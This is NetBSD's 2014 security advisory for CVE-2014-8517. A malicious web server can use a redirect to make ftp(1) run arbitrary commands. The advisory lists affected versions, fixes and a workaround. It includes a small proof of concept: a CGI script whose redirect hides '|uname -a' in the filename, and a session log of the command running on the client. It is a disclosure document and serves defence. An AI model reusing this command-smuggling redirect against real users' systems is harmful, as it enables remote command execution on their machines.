NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver
3 November, 2014 by security-officer@NetBSD.org | netbsd
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 NetBSD Security Advisory 2014-013 ================================= Topic: ftp(1) can be made to execute arbitrary commands by a malicious webserver Version: NetBSD-current: source prior to Oct 27th, 2014 NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc (net/tnftp) affected Severity: remote command execution Fixed: NetBSD-current: Oct 26th, 2014 NetBSD-7 branch: Oct 26th, 2014 NetBSD-6-0 branch: Oct 27th, 2014 NetBSD-6-1 branch: Oct 27th, 2014 NetBSD-6 branch: Oct 27th, 2014 NetBSD-5-2 branch: Oct 27th, 2014 NetBSD-5-1 branch: Oct 27th, 2014 NetBSD-5 branch: Oct 27th, 2014 pkgsrc: in version 20141031 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract ======== A malicious http server can cause ftp(1) to execute arbitrary commands. This vulnerability has been assigned CVE-2014-8517. Technical Details ================= If the ftp(1) program is used to act as http client and fetch data from a website, and no output file is passed via the -o argument, the client can be tricked into executing arbitrary commands. When acting as http client, the ftp(1) program will follow http redirects, and uses the part of the path after the last '/' from the last resource it accesses as the output filename (as long as -o filename is not specified). After the output filename is resolved by the ftp client, if the rest of the output filename begins with a '|', the output filename is passed to popen(3). Thus, a malicious web site could hide '|command' in a redirect and make the client execute 'command' when ftp fetched that URL. a20$ pwd /var/www/cgi-bin a20$ ls -l total 4 -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a a20$ cat redirect #!/bin/sh echo 'Status: 302 Found' echo 'Content-Type: text/html' echo 'Connection: keep-alive' echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a' echo a20$ a20$ ftp http://localhost/cgi-bin/redirect Trying ::1:80 ... ftp: Can't connect to `::1:80': Connection refused Trying 127.0.0.1:80 ... Requesting http://localhost/cgi-bin/redirect Redirected to http://192.168.2.19/cgi-bin/|uname%20-a Requesting http://192.168.2.19/cgi-bin/|uname%20-a 32 101.46 KiB/s 32 bytes retrieved in 00:00 (78.51 KiB/s) NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014 Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE BOARD evbarm a20$ Solutions and Workarounds ========================= Workaround: specifying an output filename by using "ftp -o <filename>" circumvents the issue. Solution: Get a new ftp binary: VERS being your NetBSD version DATE being a build date past the fix date for your version ARCH being your machine architecture ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/bin/ftp or build a new ftp binary from source. Affected file: src/usr.bin/ftp/fetch.c Fixed versions: HEAD 1.206 netbsd-7 1.205.4.1 netbsd-6 1.195.2.2 netbsd-6-1 1.195.8.1 netbsd-6-0 1.195.6.1 netbsd-5 1.185.6.3 netbsd-5-2 1.185.6.2.4.1 netbsd-5-1 1.185.14.1 Thanks To ========= Thanks to Jared McNeill, who found the issue by code inspection, and Christos Zoulas for changing ftp(1) to only use | commands for user supplied names. Revision History ================ 2014-11-03 Initial release More Information ================ Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.15 (NetBSD) iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS 7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z vl53ohkfVbRu9lgNIrwhXNrdqMa4RUZDbeurjHtwL27Jie/Pn34S+F1KW3Y8HF9Z +byMgh/NQ0MVtntekjsji1K1v2RLCeFtj/fqPNT5qS0V9Q3YAfga2k7YJLpt1gVF ELJBXLdc9E1V0F8fmq6KMVWgAQbNOwblTsmFEJB6dzTsDq8S1uJMeiRSOxYcwIAL 0SR3por56VO+T+55cxCiE6dDgG1gXrSO/4E+Qg/7EartswwGNGCKdLL/8uouEa4z MWVpI9n8SqcunbhOMfs6RiMvCc8IU+IZUm5oafwZg6UcgesFVv+svv5yOFEWx9Ao WQjoUrENY04P2fDHaA8wNWOgNltTqlRlghUUd/1BFABdRdZVy9GSs4q/dFkX9u2K O/+584pAiUPJO5TvF21GkRCWXkAx8xBXpKvIWTquIyf1zMX0YwRdLC86eLScLJX+ 30pl49nJnf0QMIcucdl2BLp+XAtKAwqq4DXCS7TQHLmB2gA6QAmAR1pnjuKnPesC AXvzXxV2+JPCQv38N7GAOYVdURObfjhiubCFErWvRkF+fv19cLYxz48knouXbOgR WDYihwgW4aBgf6EOkXCE =JRi/ -----END PGP SIGNATURE-----